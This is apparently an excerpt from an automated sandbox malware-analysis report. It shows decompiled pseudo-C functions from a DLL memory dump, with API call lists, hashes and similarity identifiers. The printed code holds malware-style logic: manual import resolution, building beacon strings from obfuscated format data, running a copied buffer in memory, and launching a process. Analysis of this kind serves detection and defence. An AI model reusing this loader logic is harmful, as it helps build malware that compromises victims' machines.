                                          				}
                                          				_t100 = E00C7614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t8 = _t81 + 0xc7e8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0xc7d238, 0, _t100);
                                          				}
                                          				_t101 =  *0xc7d324; // 0x31395b0
                                          				_a32 = E00C7757B(0xc7d00a, _t101 + 4);
                                          				_t43 =  *0xc7d2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t11 = _t77 + 0xc7e8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0xc7d2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t13 = _t74 + 0xc7e8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0xc7d238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E00C7749F(GetTickCount());
                                          						_t51 =  *0xc7d324; // 0x31395b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0xc7d324; // 0x31395b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0xc7d324; // 0x31395b0
                                          						_t106 = E00C74D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0xc7c294);
                                          							_t63 =  *0xc7d2a4; // 0x24ba5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0xc7e252; // 0x616d692f
                                          							_t65 = E00C79DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E00C7666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E00C76106();
                                          								}
                                          								HeapFree( *0xc7d238, 0, _v48);
                                          							}
                                          							HeapFree( *0xc7d238, 0, _t106);
                                          						}
                                          						HeapFree( *0xc7d238, 0, _t103);
                                          					}
                                          					HeapFree( *0xc7d238, 0, _a24);
                                          				}
                                          				HeapFree( *0xc7d238, 0, _t108);
                                          				return _a12;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00C75166
                                          • wsprintfA.USER32 ref: 00C751B3
                                          • wsprintfA.USER32 ref: 00C751D0
                                          • wsprintfA.USER32 ref: 00C751F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C75203
                                          • wsprintfA.USER32 ref: 00C75225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C75235
                                          • wsprintfA.USER32 ref: 00C7526C
                                          • wsprintfA.USER32 ref: 00C7528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C752A9
                                          • GetTickCount.KERNEL32 ref: 00C752B9
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C752CD
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C752EB
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?,031395B0), ref: 00C74D57
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(?,?,?,00C752FE,?,031395B0), ref: 00C74D5F
                                            • Part of subcall function 00C74D2C: strcpy.NTDLL ref: 00C74D76
                                            • Part of subcall function 00C74D2C: lstrcat.KERNEL32(00000000,?), ref: 00C74D81
                                            • Part of subcall function 00C74D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C74D9E
                                          • StrTrimA.SHLWAPI(00000000,00C7C294,?,031395B0), ref: 00C7531D
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?,00000000,00000000,00C75335,616D692F,00000000), ref: 00C79DFB
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?), ref: 00C79E03
                                            • Part of subcall function 00C79DEF: lstrcpy.KERNEL32(00000000,?), ref: 00C79E1A
                                            • Part of subcall function 00C79DEF: lstrcat.KERNEL32(00000000,?), ref: 00C79E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00C75348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 00C7535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00C75360
                                            • Part of subcall function 00C7666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 00C76720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00C75390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00C7539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,031395B0), ref: 00C753AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C753C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C753CF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 81a50f3e5cae4b3e3091855bae3350ba35ba6ea2e8fdae7f14ba9a3763edd1cf
                                          • Instruction ID: c1781026640751aa3e4d27b2ea69cd5680b8b6e06f590f100ed6cb3591054f58
                                          • Opcode Fuzzy Hash: 81a50f3e5cae4b3e3091855bae3350ba35ba6ea2e8fdae7f14ba9a3763edd1cf
                                          • Instruction Fuzzy Hash: F7617972500605AFD7119B68EC88F5E7BB8EF48340F054118F90EDB272DB35ED869BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E00C7ADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0xc70000;
                                          				_t115 = _t139[3] + 0xc70000;
                                          				_t131 = _t139[4] + 0xc70000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0xc70000;
                                          				_v16 = _t139[5] + 0xc70000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0xc70002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0xc7d1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0xc7d1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0xc7d1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0xc7d19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0xc7d1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0xc7d198; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0xc7d198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0xc7d19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}


                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 00C7AE9B
                                          • GetLastError.KERNEL32 ref: 00C7AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00C7AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: cc9bcb2c1035a0383083ba5970b8052b1e0437ae8faf401e6f0e1d548c05c6d3
                                          • Instruction ID: dfb63505b58f4a63bc1555337f2b14dd1e611ef3aeef7ce4959cc33297495f7a
                                          • Opcode Fuzzy Hash: cc9bcb2c1035a0383083ba5970b8052b1e0437ae8faf401e6f0e1d548c05c6d3
                                          • Instruction Fuzzy Hash: CB812AB1A00205EFDB15CFA9D884BAEB7F5FF88310F148029E919E7250EB70EA45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E00C730FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0xc7d33c; // 0x3139bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E00C79810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0xc7c19c;
                                          				}
                                          				_t44 = E00C747E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E00C758BE(lstrlenW(0xc7eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xc7eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
                                          						_t75 =  *0xc7d2a4; // 0x24ba5a8
                                          						_t73 =  *0xc7d11c; // 0xc7abc9
                                          						_t18 = _t75 + 0xc7eb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E00C758BE(lstrlenW(0xc7ec58) + _a8 + _t57 + _t58 + lstrlenW(0xc7ec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E00C7147E(_v16);
                                          						} else {
                                          							_t64 =  *0xc7d2a4; // 0x24ba5a8
                                          							_t31 = _t64 + 0xc7ec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E00C7147E(_v8);
                                          				}
                                          				return _v20;
                                          			}


                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00C73111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 00C7314C
                                          • lstrlen.KERNEL32(?), ref: 00C73155
                                          • lstrlen.KERNEL32(00000000), ref: 00C7315C
                                          • lstrlenW.KERNEL32(80000002), ref: 00C7316A
                                          • lstrlenW.KERNEL32(00C7EB38), ref: 00C73173
                                          • lstrlen.KERNEL32(?), ref: 00C731B7
                                          • lstrlen.KERNEL32(?), ref: 00C731BF
                                          • lstrlenW.KERNEL32(?), ref: 00C731CA
                                          • lstrlenW.KERNEL32(00C7EC58), ref: 00C731D3
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: a61d799d12b078cbc3a86b88d2efed11fd9a32c642d04828b0e8cbbd34958cdf
                                          • Instruction ID: 5ef699eed716a595e501183cac14bb6ddb6d2bb8f84a70585daa3f9a47f1b939
                                          • Opcode Fuzzy Hash: a61d799d12b078cbc3a86b88d2efed11fd9a32c642d04828b0e8cbbd34958cdf
                                          • Instruction Fuzzy Hash: 91314B76D0010AEFCF01AFA4CC4599E7FB9FF48354B1580A5E918AB222DB31DA11EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E005F15C2(intOrPtr* _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed short _v12;
                                          				struct HINSTANCE__* _v16;
                                          				intOrPtr _v20;
                                          				_Unknown_base(*)()* _v24;
                                          				intOrPtr _t34;
                                          				intOrPtr _t36;
                                          				struct HINSTANCE__* _t37;
                                          				intOrPtr _t40;
                                          				CHAR* _t44;
                                          				_Unknown_base(*)()* _t45;
                                          				intOrPtr* _t52;
                                          				intOrPtr _t53;
                                          				signed short _t54;
                                          				intOrPtr* _t57;
                                          				signed short _t59;
                                          				CHAR* _t60;
                                          				CHAR* _t62;
                                          				signed short* _t64;
                                          				void* _t65;
                                          				signed short _t72;
                                          
                                          				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                          				_v8 = _v8 & 0x00000000;
                                          				_t52 = _a4;
                                          				if(_t34 == 0) {
                                          					L28:
                                          					return _v8;
                                          				}
                                          				_t57 = _t34 + _t52;
                                          				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                          				_a4 = _t57;
                                          				if(_t36 == 0) {
                                          					L27:
                                          					goto L28;
                                          				}
                                          				while(1) {
                                          					_t62 = _t36 + _t52;
                                          					_t37 = LoadLibraryA(_t62);
                                          					_v16 = _t37;
                                          					if(_t37 == 0) {
                                          						break;
                                          					}
                                          					_v12 = _v12 & 0x00000000;
                                          					memset(_t62, 0, lstrlenA(_t62));
                                          					_t53 =  *_t57;
                                          					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                          					_t65 = _t65 + 0xc;
                                          					if(_t53 != 0) {
                                          						L6:
                                          						_t64 = _t53 + _t52;
                                          						_t54 =  *_t64;
                                          						if(_t54 == 0) {
                                          							L23:
                                          							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                          							_t57 = _t57 + 0x14;
                                          							_a4 = _t57;
                                          							if(_t36 != 0) {
                                          								continue;
                                          							}
                                          							L26:
                                          							goto L27;
                                          						}
                                          						_v20 = _t40 - _t64 + _t52;
                                          						_t72 = _t54;
                                          						L8:
                                          						L8:
                                          						if(_t72 < 0) {
                                          							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                          								_t59 = 0;
                                          								_v12 =  *_t64 & 0x0000ffff;
                                          							} else {
                                          								_t59 = _t54;
                                          							}
                                          						} else {
                                          							_t59 = _t54 + _t52;
                                          						}
                                          						_t20 = _t59 + 2; // 0x2
                                          						_t44 = _t20;
                                          						if(_t59 == 0) {
                                          							_t44 = _v12 & 0x0000ffff;
                                          						}
                                          						_t45 = GetProcAddress(_v16, _t44);
                                          						_v24 = _t45;
                                          						if(_t45 == 0) {
                                          							goto L21;
                                          						}
                                          						if(_t59 != 0) {
                                          							_t60 = _t59 + 2;
                                          							memset(_t60, 0, lstrlenA(_t60));
                                          							_t65 = _t65 + 0xc;
                                          						}
                                          						 *(_v20 + _t64) = _v24;
                                          						_t64 =  &(_t64[2]);
                                          						_t54 =  *_t64;
                                          						if(_t54 != 0) {
                                          							goto L8;
                                          						} else {
                                          							L22:
                                          							_t57 = _a4;
                                          							goto L23;
                                          						}
                                          						L21:
                                          						_v8 = 0x7f;
                                          						goto L22;
                                          					}
                                          					_t53 = _t40;
                                          					if(_t40 == 0) {
                                          						goto L23;
                                          					}
                                          					goto L6;
                                          				}
                                          				_v8 = 0x7e;
                                          				goto L26;
                                          			}


                                          APIs
                                          • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 005F15F8
                                          • lstrlenA.KERNEL32(?), ref: 005F160E
                                          • memset.NTDLL ref: 005F1618
                                          • GetProcAddress.KERNEL32(?,00000002), ref: 005F167B
                                          • lstrlenA.KERNEL32(-00000002), ref: 005F1690
                                          • memset.NTDLL ref: 005F169A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemset$AddressLibraryLoadProc
                                          • String ID: ~
                                          • API String ID: 1986585659-1707062198
                                          • Opcode ID: bb13d4875ef30258dbb3ac02228cceee63db88b8f15d865a11d8bb1d6f67da50
                                          • Instruction ID: c7493781c4a674ff50d00c56e75bfb916c2123d10dbabac9801fefd9e41c6531
                                          • Opcode Fuzzy Hash: bb13d4875ef30258dbb3ac02228cceee63db88b8f15d865a11d8bb1d6f67da50
                                          • Instruction Fuzzy Hash: FF31B8B5A00A1AEBDB14CF15C854BBDBBB8BF54344F14412DEE05DB640DB38EA05CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E00C71493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E00C757D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0xc7d260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t18 = _t46 + 0xc7e3e6; // 0x73797325
                                          					_t66 = E00C777E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0xc7d2a4; // 0x24ba5a8
                                          						_t19 = _t49 + 0xc7e747; // 0x3138cef
                                          						_t20 = _t49 + 0xc7e0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E00C7684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E00C7684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0xc7d238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E00C7147E(_t68);
                                          				goto L12;
                                          			}




















                                          APIs
                                            • Part of subcall function 00C757D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C714AF,?,?,?,?,00000000,00000000), ref: 00C757FD
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C7581F
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C75835
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C7584B
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C75861
                                            • Part of subcall function 00C757D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C75877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00C714C5
                                          • memset.NTDLL ref: 00C71500
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00C7333A,73797325), ref: 00C777F7
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C77811
                                          • GetModuleHandleA.KERNEL32(4E52454B,03138CEF,73797325), ref: 00C71536
                                          • GetProcAddress.KERNEL32(00000000), ref: 00C7153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C715A5
                                            • Part of subcall function 00C7684E: GetProcAddress.KERNEL32(36776F57,00C7935F), ref: 00C76869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 00C71582
                                          • CloseHandle.KERNEL32(?), ref: 00C71587
                                          • GetLastError.KERNEL32(00000001), ref: 00C7158B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: b9eb45ade125c7a2396a87f706d3ae69673e953fb2d5b19258bd086f252eca44
                                          • Instruction ID: f688c1878c315d970cf0d8b66911c92439e02c8557914926903e6f46716d973b
                                          • Opcode Fuzzy Hash: b9eb45ade125c7a2396a87f706d3ae69673e953fb2d5b19258bd086f252eca44
                                          • Instruction Fuzzy Hash: 7E3132B2800209EFDB21AFA4DC89E9EBBBCEF48344F144565F61AA7121D7319E44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E00C74D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t1 = _t9 + 0xc7e62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E00C76027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E00C758BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E00C76F33(_t34, _t41, _a8);
                                          						E00C7147E(_t41);
                                          						_t42 = E00C74759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E00C7147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E00C74858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E00C7147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
